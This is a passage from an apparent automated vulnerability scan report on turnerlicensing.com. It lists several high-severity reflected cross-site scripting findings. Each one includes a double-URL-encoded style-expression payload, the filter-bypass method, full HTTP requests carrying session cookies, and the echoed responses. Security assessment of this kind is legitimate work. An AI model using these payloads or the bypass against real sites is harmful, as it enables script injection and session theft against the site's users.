X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=932
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 94980


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>San Antonio Spurs</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144150&f7529%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252795ef547ec66=1&f7529'style='x:expression(alert(1))'95ef547ec66=1&fromsla=T&f7529%27style%3d%27x%3aexpression%28alert%281%29%29%2795ef547ec66=1'>
...[SNIP]...

1.49. http://www.turnerlicensing.com/NBA/san_antonio_spurs/8010807 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/san_antonio_spurs/8010807

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae55b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274a4aaea7f43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae55b'style='x:expression(alert(1))'4a4aaea7f43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/san_antonio_spurs/8010807?ae55b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274a4aaea7f43=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.turnerlicensing.com/NBA
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.turnerlicensing.com
Proxy-Connection: Keep-Alive
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId3=rnoX2q9XAatYKaJC; JSESSIONID=5FGwMyBPj2G9W1Yp7Zy2vGPjsmpGvTRLK5dLCcGL1LQd27JDFJ2hjzvGZJdq31s19kkgnxsBqmQQqJp7C24sztLlX2QJNz6JFx0xSDXrxwjDszkrLTjK3L22n5n1bXhG!-639703385; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290272924.1290272963.7; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.2.10.1290272963; __utmc=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:24:47 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:24:48 GMT
NS_RTIMER_COMPOSITE: -1146971545:73686F702D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=jpjmMySPJTDrXk7jJtM9Fk2NyCkHkdwfTVkSNt7g05mGF87jsx0Xjp66ytM1N2CPSrX2QhGnkcNYShQTLnK8pS4c4QSgYZKYJswRtMn2Lw18BLj21lRkPW3Tx7Lvy12G!-639703385; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:24:48 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 71664


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>San Antonio Spurs</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144150&it=A&id=8454&ae55b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274a4aaea7f43=1&ae55b'style='x:expression(alert(1))'4a4aaea7f43=1&ae55b%27style%3d%27x%3aexpression%28alert%281%29%29%274a4aaea7f43=1&fromsla=T'>
...[SNIP]...

1.50. http://www.turnerlicensing.com/NBA/seattle_supersonics [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/seattle_supersonics

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e46d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252767e2d14c890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e46d'style='x:expression(alert(1))'67e2d14c890 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/seattle_supersonics?4e46d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252767e2d14c890=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:17 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:18 GMT
NS_RTIMER_COMPOSITE: -1158387194:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=X8x7MyTVd4mF9SRtddq64DRLkf1pmMH05J53r7Gv4LWWtf25BGcQX02C2hPlGQ1ZzpVp94ccJMzHHNh4JGH2yLXSxQgzKyJnPkvyNhMH8WynWg6CbBQTKjTy0nFc1xkY!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:26 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=909
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 45629


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Seattle Supersonics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144151&4e46d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252767e2d14c890=1&4e46d%27style%3d%27x%3aexpression%28alert%281%29%29%2767e2d14c890=1&4e46d'style='x:expression(alert(1))'67e2d14c890=1&fromsla=T'>
...[SNIP]...

1.51. http://www.turnerlicensing.com/NBA/toronto_raptors [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/toronto_raptors

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 626bf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ceefe8f1570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 626bf'style='x:expression(alert(1))'ceefe8f1570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/toronto_raptors?626bf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ceefe8f1570=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:22 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:23 GMT
NS_RTIMER_COMPOSITE: 1558476825:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=kPN5MyTh81TWL278Ql7PNy0XVNQdsQmLZ2jXw9TGnBBlvcSRnGmPprCTM2vSLgyQQnwQnk5ggs1WFfhjRLLfVTb4CNG3Dnhxsfs1fz98XMmds3J3pt3KJNgjTlBxXKQt!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:35 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=844
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 80999


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Toronto Raptors</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144153&626bf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ceefe8f1570=1&626bf%27style%3d%27x%3aexpression%28alert%281%29%29%27ceefe8f1570=1&626bf'style='x:expression(alert(1))'ceefe8f1570=1&fromsla=T'>
...[SNIP]...

1.52. http://www.turnerlicensing.com/NBA/utah_jazz [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/utah_jazz

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf4d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e0d3723f51a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf4d0'style='x:expression(alert(1))'e0d3723f51a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/utah_jazz?bf4d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e0d3723f51a=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:29 GMT
NS_RTIMER_COMPOSITE: 1660842171:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=8l6GMyJQHspz21548qhpmBJ7WC11kCbsmkvpJ3w9hBFLmnBR2LhnfHz7yM7LyGTxLjmVKhmhG99Qlh1nvC2rBCB1VWjJc2LJDHkn32NJvYzfhpfV2qWD33vkThsFGYL1!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:40 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=950
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 67443


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Utah Jazz</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
nsing.com/s.nl?sc=69&category=144155&bf4d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e0d3723f51a=1&bf4d0%27style%3d%27x%3aexpression%28alert%281%29%29%27e0d3723f51a=1&fromsla=T&bf4d0'style='x:expression(alert(1))'e0d3723f51a=1'>
...[SNIP]...

1.53. http://www.turnerlicensing.com/NBA/washington_wizards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/washington_wizards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61f21%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270b6453a6910 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61f21'style='x:expression(alert(1))'0b6453a6910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/washington_wizards?61f21%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270b6453a6910=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:29 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:32 GMT
NS_RTIMER_COMPOSITE: -714482075:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2whLMyJDYvtL5ywvvXjvRXFYhGDZnmZXQMGH32yt5Tw5shgj1jFvp2wpzpNhmV11YGcXQ9GLyT7sv2pcyQsZtDSzlZVtRtJbCxmlFPrhjDBsKphKxF6C51XxpM2PtvdS!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:50 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=977
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 73119


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Washington Wizards</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';<
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144157&61f21%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270b6453a6910=1&61f21%27style%3d%27x%3aexpression%28alert%281%29%29%270b6453a6910=1&61f21'style='x:expression(alert(1))'0b6453a6910=1&fromsla=T'>
...[SNIP]...

1.54. http://www.turnerlicensing.com/NFL [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NFL

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bff4'style='x:expression(alert(1))'467f646483f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NFL?4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:27 GMT
NS_RTIMER_COMPOSITE: -1590895309:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=945
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 58596


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NFL</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=67&4bff4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527467f646483f=1&4bff4'style='x:expression(alert(1))'467f646483f=1&4bff4%27style%3d%27x%3aexpression%28alert%281%29%29%27467f646483f=1&fromsla=T'>
...[SNIP]...

1.55. http://www.turnerlicensing.com/NHL [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NHL

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c378'style='x:expression(alert(1))'55966d0d35d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NHL?9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:27 GMT
NS_RTIMER_COMPOSITE: -109262757:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=941
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 58337


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>NHL</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=70&9c378%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252755966d0d35d=1&9c378'style='x:expression(alert(1))'55966d0d35d=1&9c378%27style%3d%27x%3aexpression%28alert%281%29%29%2755966d0d35d=1&fromsla=T'>
...[SNIP]...

1.56. http://www.turnerlicensing.com/Players [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Players

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 830e5'style='x:expression(alert(1))'65ac4008624 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Players?830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 1114186826:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=555
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 63359


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Players</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=72&830e5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252765ac4008624=1&830e5'style='x:expression(alert(1))'65ac4008624=1&830e5%27style%3d%27x%3aexpression%28alert%281%29%29%2765ac4008624=1&fromsla=T'>
...[SNIP]...

1.57. http://www.turnerlicensing.com/Stadiums [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /Stadiums

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c355'style='x:expression(alert(1))'2ca472c83b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Stadiums?4c355%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272ca472c83b2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: -1255247182:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=981
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 89698


<html>
<head>
